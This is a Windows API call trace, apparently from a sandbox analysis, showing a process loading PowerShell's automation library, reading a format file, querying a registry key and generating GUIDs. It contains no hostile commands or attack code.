	[0111.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.629] VirtualQuery (in: lpAddress=0xcba80, lpBuffer=0xcc940, dwLength=0x30 | out: lpBuffer=0xcc940*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.629] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xd83118e7, Data2=0x943e, Data3=0x45b2, Data4=([0]=0x99, [1]=0x4e, [2]=0x2d, [3]=0xb9, [4]=0x15, [5]=0x5a, [6]=0xc8, [7]=0x2f))) returned 0x0
	[0111.629] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x9e2ed0f0, Data2=0x8358, Data3=0x4639, Data4=([0]=0xb5, [1]=0x36, [2]=0x67, [3]=0x9e, [4]=0xd9, [5]=0x5d, [6]=0x82, [7]=0x8b))) returned 0x0
	[0111.630] VirtualQuery (in: lpAddress=0xcbc30, lpBuffer=0xccaf0, dwLength=0x30 | out: lpBuffer=0xccaf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.630] VirtualQuery (in: lpAddress=0xcbc30, lpBuffer=0xccaf0, dwLength=0x30 | out: lpBuffer=0xccaf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.630] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x6a4f5041, Data2=0xd182, Data3=0x4dc5, Data4=([0]=0x8f, [1]=0xfb, [2]=0x16, [3]=0x6f, [4]=0x99, [5]=0xe9, [6]=0xec, [7]=0x94))) returned 0x0
	[0111.630] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xc1b059df, Data2=0xbfc1, Data3=0x4937, Data4=([0]=0xb6, [1]=0x4d, [2]=0x67, [3]=0xa1, [4]=0xb0, [5]=0x95, [6]=0x54, [7]=0x13))) returned 0x0
	[0111.631] VirtualQuery (in: lpAddress=0xcbe80, lpBuffer=0xccd40, dwLength=0x30 | out: lpBuffer=0xccd40*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.631] VirtualQuery (in: lpAddress=0xcbbc0, lpBuffer=0xcca80, dwLength=0x30 | out: lpBuffer=0xcca80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.631] VirtualQuery (in: lpAddress=0xcbbc0, lpBuffer=0xcca80, dwLength=0x30 | out: lpBuffer=0xcca80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.631] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x5bff7aeb, Data2=0x3101, Data3=0x4add, Data4=([0]=0xb2, [1]=0xb, [2]=0xd8, [3]=0x73, [4]=0x46, [5]=0x34, [6]=0x6f, [7]=0x8a))) returned 0x0
	[0111.631] VirtualQuery (in: lpAddress=0xcbe80, lpBuffer=0xccd40, dwLength=0x30 | out: lpBuffer=0xccd40*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.632] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.632] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.632] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.632] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x7ffdb958, Data2=0x64ce, Data3=0x4ab8, Data4=([0]=0x8e, [1]=0xb2, [2]=0x89, [3]=0x2e, [4]=0xdb, [5]=0xb8, [6]=0x24, [7]=0xd8))) returned 0x0
	[0111.632] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x1d712ae2, Data2=0x7129, Data3=0x4c04, Data4=([0]=0x88, [1]=0x68, [2]=0x6b, [3]=0x94, [4]=0xff, [5]=0x38, [6]=0x12, [7]=0x99))) returned 0x0
	[0111.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0111.633] SetErrorMode (uMode=0x1) returned 0x1
	[0111.633] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0111.633] GetFileType (hFile=0x330) returned 0x1
	[0111.633] SetErrorMode (uMode=0x1) returned 0x1
	[0111.633] GetFileType (hFile=0x330) returned 0x1
	[0111.633] ReadFile (in: hFile=0x330, lpBuffer=0x34e5de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34e5de0*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.635] ReadFile (in: hFile=0x330, lpBuffer=0x34e5de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34e5de0*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.635] ReadFile (in: hFile=0x330, lpBuffer=0x34e5de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34e5de0*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.635] ReadFile (in: hFile=0x330, lpBuffer=0x34e5de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34e5de0*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.636] ReadFile (in: hFile=0x330, lpBuffer=0x34e5de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34e5de0*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.636] ReadFile (in: hFile=0x330, lpBuffer=0x34e5de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34e5de0*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.636] ReadFile (in: hFile=0x330, lpBuffer=0x34e5de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34e5de0*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.636] ReadFile (in: hFile=0x330, lpBuffer=0x34e5de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34e5de0*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.637] ReadFile (in: hFile=0x330, lpBuffer=0x34e5de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34e5de0*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.637] ReadFile (in: hFile=0x330, lpBuffer=0x34e5de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34e5de0*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.638] ReadFile (in: hFile=0x330, lpBuffer=0x34e5de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34e5de0*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.638] ReadFile (in: hFile=0x330, lpBuffer=0x34e5de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34e5de0*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.638] ReadFile (in: hFile=0x330, lpBuffer=0x34e5de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34e5de0*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.638] ReadFile (in: hFile=0x330, lpBuffer=0x34e5de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34e5de0*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.639] ReadFile (in: hFile=0x330, lpBuffer=0x34e5de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34e5de0*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.639] ReadFile (in: hFile=0x330, lpBuffer=0x34e5de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34e5de0*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.640] ReadFile (in: hFile=0x330, lpBuffer=0x34e5de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34e5de0*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.640] ReadFile (in: hFile=0x330, lpBuffer=0x34e5de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34e5de0*, lpNumberOfBytesRead=0xccf58*=0xbce, lpOverlapped=0x0) returned 1
	[0111.640] ReadFile (in: hFile=0x330, lpBuffer=0x34e5516, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34e5516*, lpNumberOfBytesRead=0xccf58*=0x0, lpOverlapped=0x0) returned 1
	[0111.641] ReadFile (in: hFile=0x330, lpBuffer=0x34e5de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34e5de0*, lpNumberOfBytesRead=0xccf58*=0x0, lpOverlapped=0x0) returned 1
	[0111.641] CloseHandle (hObject=0x330) returned 1
	[0111.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0111.641] SetErrorMode (uMode=0x1) returned 0x1
	[0111.641] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccf00 | out: lpFileInformation=0xccf00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0111.641] SetErrorMode (uMode=0x1) returned 0x1
	[0111.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0111.641] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x330) returned 0x0
	[0111.641] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf6c, lpData=0x0, lpcbData=0xccf68*=0x0 | out: lpType=0xccf6c*=0x1, lpData=0x0, lpcbData=0xccf68*=0x56) returned 0x0
	[0111.642] CoTaskMemAlloc (cb=0x5a) returned 0x1b8515b0
	[0111.642] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf3c, lpData=0x1b8515b0, lpcbData=0xccf38*=0x56 | out: lpType=0xccf3c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccf38*=0x56) returned 0x0
	[0111.642] CoTaskMemFree (pv=0x1b8515b0) 
	[0111.642] RegCloseKey (hKey=0x330) returned 0x0
	[0111.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0111.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0111.645] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xdab71bc7, Data2=0x9236, Data3=0x4172, Data4=([0]=0xba, [1]=0x9a, [2]=0x2f, [3]=0x56, [4]=0x0, [5]=0xdb, [6]=0x89, [7]=0x64))) returned 0x0
	[0111.645] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xa8d2513a, Data2=0x8b74, Data3=0x4e75, Data4=([0]=0x97, [1]=0xc5, [2]=0x82, [3]=0x3b, [4]=0x1d, [5]=0x48, [6]=0xaa, [7]=0x96))) returned 0x0
	[0111.646] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xf0384790, Data2=0x6266, Data3=0x411c, Data4=([0]=0x91, [1]=0x62, [2]=0xf7, [3]=0xa1, [4]=0x60, [5]=0x6a, [6]=0xce, [7]=0xca))) returned 0x0
	[0111.646] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x957fddc8, Data2=0x3fab, Data3=0x4001, Data4=([0]=0x90, [1]=0x5a, [2]=0xbf, [3]=0x41, [4]=0x1f, [5]=0x45, [6]=0xc5, [7]=0x80))) returned 0x0
	[0111.646] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x4aa6a057, Data2=0x6dce, Data3=0x4888, Data4=([0]=0xa7, [1]=0xe9, [2]=0x1e, [3]=0x33, [4]=0x6, [5]=0x14, [6]=0xa6, [7]=0x39))) returned 0x0
	[0111.647] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xac9c7a69, Data2=0x2b6a, Data3=0x407b, Data4=([0]=0xba, [1]=0x6e, [2]=0x4d, [3]=0x9b, [4]=0x8f, [5]=0xc9, [6]=0xe3, [7]=0x7a))) returned 0x0
	[0111.647] VirtualQuery (in: lpAddress=0xcbbc0, lpBuffer=0xcca80, dwLength=0x30 | out: lpBuffer=0xcca80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.648] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x55118c50, Data2=0x2e1, Data3=0x4adb, Data4=([0]=0x97, [1]=0xde, [2]=0xd7, [3]=0xf3, [4]=0x68, [5]=0xd4, [6]=0x23, [7]=0xc9))) returned 0x0
	[0111.648] VirtualQuery (in: lpAddress=0xcbbc0, lpBuffer=0xcca80, dwLength=0x30 | out: lpBuffer=0xcca80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.649] VirtualQuery (in: lpAddress=0xcbbc0, lpBuffer=0xcca80, dwLength=0x30 | out: lpBuffer=0xcca80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.650] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x74f8db0d, Data2=0x1fdc, Data3=0x47bb, Data4=([0]=0x84, [1]=0x92, [2]=0x29, [3]=0x6e, [4]=0xbc, [5]=0x7, [6]=0x8d, [7]=0xcc))) returned 0x0
	[0111.650] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x4aaeba0b, Data2=0xa05f, Data3=0x4966, Data4=([0]=0x89, [1]=0xc, [2]=0x79, [3]=0x3c, [4]=0xb9, [5]=0x4f, [6]=0x50, [7]=0x87))) returned 0x0
	[0111.651] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xedaac57e, Data2=0x2043, Data3=0x4371, Data4=([0]=0xba, [1]=0x4c, [2]=0x67, [3]=0x82, [4]=0xd3, [5]=0xc, [6]=0x66, [7]=0xac))) returned 0x0
	[0111.651] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xbc6f8af8, Data2=0x6ab6, Data3=0x4f8a, Data4=([0]=0xac, [1]=0x3, [2]=0x78, [3]=0x43, [4]=0x9, [5]=0x7a, [6]=0xf8, [7]=0x95))) returned 0x0
	[0111.651] VirtualQuery (in: lpAddress=0xcbbc0, lpBuffer=0xcca80, dwLength=0x30 | out: lpBuffer=0xcca80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.652] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xb0db2f72, Data2=0x4243, Data3=0x40ba, Data4=([0]=0x80, [1]=0x22, [2]=0x31, [3]=0xc5, [4]=0x70, [5]=0x84, [6]=0xd6, [7]=0x7c))) returned 0x0
	[0111.652] VirtualQuery (in: lpAddress=0xcbbc0, lpBuffer=0xcca80, dwLength=0x30 | out: lpBuffer=0xcca80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.653] VirtualQuery (in: lpAddress=0xcbbc0, lpBuffer=0xcca80, dwLength=0x30 | out: lpBuffer=0xcca80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.654] VirtualQuery (in: lpAddress=0xcbbc0, lpBuffer=0xcca80, dwLength=0x30 | out: lpBuffer=0xcca80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.655] VirtualQuery (in: lpAddress=0xcbbc0, lpBuffer=0xcca80, dwLength=0x30 | out: lpBuffer=0xcca80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.655] VirtualQuery (in: lpAddress=0xcbbc0, lpBuffer=0xcca80, dwLength=0x30 | out: lpBuffer=0xcca80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.656] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x2aeabecc, Data2=0xc4ca, Data3=0x4d08, Data4=([0]=0xa0, [1]=0x94, [2]=0x7, [3]=0xdc, [4]=0x5, [5]=0xd8, [6]=0x77, [7]=0x61))) returned 0x0
	[0111.656] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xd61131a, Data2=0xfb33, Data3=0x4604, Data4=([0]=0xba, [1]=0xf1, [2]=0xa3, [3]=0xca, [4]=0x9e, [5]=0xcb, [6]=0xf8, [7]=0x6))) returned 0x0
	[0111.656] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x99148aad, Data2=0x6200, Data3=0x4514, Data4=([0]=0xb9, [1]=0x3f, [2]=0x8a, [3]=0xbb, [4]=0x7d, [5]=0xeb, [6]=0x1e, [7]=0x34))) returned 0x0
	[0111.656] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xfeb3cbf1, Data2=0xe50b, Data3=0x417e, Data4=([0]=0x9b, [1]=0xa4, [2]=0xd0, [3]=0x9, [4]=0xf2, [5]=0x87, [6]=0x86, [7]=0xa3))) returned 0x0
	[0111.657] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x6a3afaf1, Data2=0x5513, Data3=0x4fc7, Data4=([0]=0xa1, [1]=0x39, [2]=0xcc, [3]=0xaf, [4]=0xc3, [5]=0xc4, [6]=0x1e, [7]=0xb6))) returned 0x0
	[0111.657] VirtualQuery (in: lpAddress=0xcbe80, lpBuffer=0xccd40, dwLength=0x30 | out: lpBuffer=0xccd40*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.657] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x1692863f, Data2=0xcda7, Data3=0x45bd, Data4=([0]=0x8a, [1]=0xd6, [2]=0xf, [3]=0xb2, [4]=0x86, [5]=0xdb, [6]=0x64, [7]=0x4))) returned 0x0
	[0111.657] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x475bcf84, Data2=0x8fb0, Data3=0x4edf, Data4=([0]=0x97, [1]=0x10, [2]=0x93, [3]=0x5f, [4]=0x24, [5]=0x2d, [6]=0xb3, [7]=0x9e))) returned 0x0
	[0111.657] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x9cc225, Data2=0x136, Data3=0x4c27, Data4=([0]=0x9e, [1]=0x26, [2]=0xaa, [3]=0x46, [4]=0x96, [5]=0x3e, [6]=0x25, [7]=0xc6))) returned 0x0
	[0111.658] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x88c07038, Data2=0xfe10, Data3=0x4650, Data4=([0]=0x93, [1]=0x3c, [2]=0x71, [3]=0xd6, [4]=0x3b, [5]=0xe1, [6]=0xe7, [7]=0x39))) returned 0x0
	[0111.658] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xab0493d8, Data2=0x4fb8, Data3=0x41cf, Data4=([0]=0x89, [1]=0x2f, [2]=0xe5, [3]=0xe, [4]=0xcd, [5]=0x9e, [6]=0x1e, [7]=0xba))) returned 0x0
	[0111.658] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xbccaf594, Data2=0x3b0f, Data3=0x40bd, Data4=([0]=0xa2, [1]=0xc9, [2]=0x1f, [3]=0x8, [4]=0xc9, [5]=0xe4, [6]=0xa5, [7]=0x56))) returned 0x0
	[0111.658] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x2fe5ad36, Data2=0x37da, Data3=0x461a, Data4=([0]=0xa0, [1]=0x42, [2]=0x10, [3]=0xa7, [4]=0xad, [5]=0x4a, [6]=0xf6, [7]=0xc3))) returned 0x0
	[0111.659] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x63aec1de, Data2=0xb2fd, Data3=0x43a4, Data4=([0]=0xae, [1]=0x6, [2]=0x50, [3]=0x25, [4]=0x63, [5]=0x2e, [6]=0xd1, [7]=0x6f))) returned 0x0
	[0111.659] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x9db7ff4e, Data2=0xb8f8, Data3=0x405c, Data4=([0]=0x9e, [1]=0x86, [2]=0xeb, [3]=0xc2, [4]=0x3e, [5]=0xa8, [6]=0xda, [7]=0xe8))) returned 0x0
	[0111.659] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x8196c912, Data2=0x2a1, Data3=0x497c, Data4=([0]=0xaa, [1]=0xd5, [2]=0x5a, [3]=0x4d, [4]=0xd7, [5]=0xef, [6]=0xb4, [7]=0x19))) returned 0x0
	[0111.659] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x3096cfce, Data2=0x123b, Data3=0x4875, Data4=([0]=0xb7, [1]=0x74, [2]=0xd9, [3]=0xbf, [4]=0x1d, [5]=0x91, [6]=0x85, [7]=0x3d))) returned 0x0
